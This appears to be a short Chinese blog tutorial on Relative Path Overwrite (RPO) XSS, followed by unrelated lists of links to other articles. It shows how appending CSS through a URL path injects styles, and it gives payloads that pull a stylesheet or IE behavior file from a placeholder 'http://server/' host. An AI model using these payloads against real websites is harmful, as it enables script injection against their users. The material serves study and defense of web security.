0x00

具体原理参考：

Infinite Security: (Relative Path Overwrite) RPO XSS
RPO Gadgets
RPO攻击

0x01

RPO攻击首先利用的是通过相对路径引入的CSS，如

<link href="styles.css" rel="stylesheet" type="text/css" />

当我们在URL最后添加

/%0a{}*{background:red;}/

的时候会发现页面执行了我们的css代码。

通过这点，我们可以做到任意加载服务器上的文件。

假若我们能控制某些文件就可以达到XSS的目的。

几个Payload:

/%0a{}@import url("http://server/style.css")/

/%0a{}img{behavior:url(http://server/test.png);}/

XSS：RPO（Relative Path Overwrite）攻击相关推荐

1. RPO 相对路径覆盖攻击

   RPO (Relative Path Overwrite) 相对路径覆盖,最早由 Gareth Heyes 在其发表的文章中提出.主要是利用浏览器的一些特性和部分服务端的配置差异导致的漏洞,通过一些技 ...

2. Relative path in absolute URI: ${system:java.io.tmpdir%7D/$%7Bsystem:user.name%7D

   hive启动报错: [jifeng@feng02 hive]$ hiveLogging initialized using configuration in jar:file:/home/jifeng ...

3. HTML相对路径(Relative Path)和绝对路径(Absolute Path)

   HTML初学者会经常遇到这样一个问题,如何正确引用一个文件.比如,怎样在一个HTML网页中引用另外一个HTML网页作为超链接(hyperlink)?怎样在一个网页中插入一张图片?...... 如果你在 ...

4. hive配置遇到的问题（ Relative path in absolute URI: ${system:java.io.tmpdir%7D/$%7Bsystem:user.name%7D）

   遇到的异常详情如下: Exception in thread "main"java.lang.RuntimeException: java.lang.IllegalArgument ...

5. hive 配置 mysql时的问题（Relative path in absolute URI: ${system:java.io.tmpdir%7D/$%7Bsystem:user.name%7D）

   因为 hive 的映射工具--metastore,默认存放在 derby 中,而derby数据库的一大缺陷在于其不支持并发访问(早期的hive是这样).当我们使用 mysql 作为其远程仓库时,自然需 ...

6. hive启动报错：Relative path in absolute URI:${system:java.io.tmpdir%7D/$%7Bsystem:user.name%7D

   hive启动时遇到以下错误: Exception in thread "main"java.lang.RuntimeException: java.lang.IllegalArgu ...

7. Hive启动报错：java.net.URISyntaxException: Relative path in absolute URI: ${system:user.name%7D

   hive> show databases; OK Failed with exception java.io.IOException:java.lang.IllegalArgumentExcep ...

8. Spark：java.net.URISyntaxException: Relative path in absolute URI: file:D:/XXX/SparkFaultBench/spark-

   错误: Spark:java.net.URISyntaxException: Relative path in absolute URI: file:D:/XXX/SparkFaultBench/sp ...

9. Hive 启动报错java.net.URISyntaxException: Relative path in absolute URI 解决方法

   linux安装hive 遇到问题:Hive 启动报错java.net.URISyntaxException: Relative path in absolute URI 解决方法 方法记录 提示:这里 ...

最新文章

1. 三年级计算机课教案文档,小学三年级信息技术第十三课文件和文件夹教学设计...
2. Winform中使用printDocument控件打印pictureBox中的二维码照片
3. boost::hana::prepend用法的测试程序
4. 从Spring到SpringBoot构建WEB MVC核心配置详解
5. Flex DES加密
6. Docker系列五~docker安装php-fpm
7. java批量插入PostgreSql
8. JavaScript数组归并方法reduce
9. 使用Sharepoint Services 3.0构建基本网站
10. python2中打印中文
11. 创蓝253云通讯平台---短信验证码接口说明
12. 【C++学习笔记】特殊用途语言特性
13. 帅哥陈 Hololens开发笔记（1）
14. 《混乱的猴子》读书笔记 -- 关于硅谷、创业、Facebook和广告
15. 「美版抖音」TikTok工程师2021年赚多少？最高年薪306万，最低77万，还不算股票期权...
16. 我有一哥们，老牛逼了……
17. 计算机默认存储格式,表格默认保存为et格式
18. 搜集的一些酷炫的金属色 ,RGB值 和大家分享一下
19. 三菱PLC——Q系列和FX3U系列通讯测试
20. 矩阵和向量相乘，向量和其转置相乘

热门文章

1. Insyde uefi 隐藏设置_安卓福利，手机桌面图标隐藏，找应用按字母轻松搞定！
2. 如何解决分布式系统中的“幽灵复现”？-转载自 阿里技术 微信公众号
3. 九种 0-1 背包问题详解
4. 大数据图数据库之数据分片
5. 【详细解读】CSS渐变用法——Web前端系列学习笔记
6. 编译原理实验报告_任意给定一个正规式 r (包括连接、或、闭包运算),根据 Thompson算法设计一个程序,生成与该正规式等价的 NFA N 。
7. Java 折半查询,java之折半查询
8. vue 安装php,vue中使用openinstall
9. java 向已存在的excel中追加数据 .
10. jxl操作excel(合并单元格,设置背景色,字体颜色)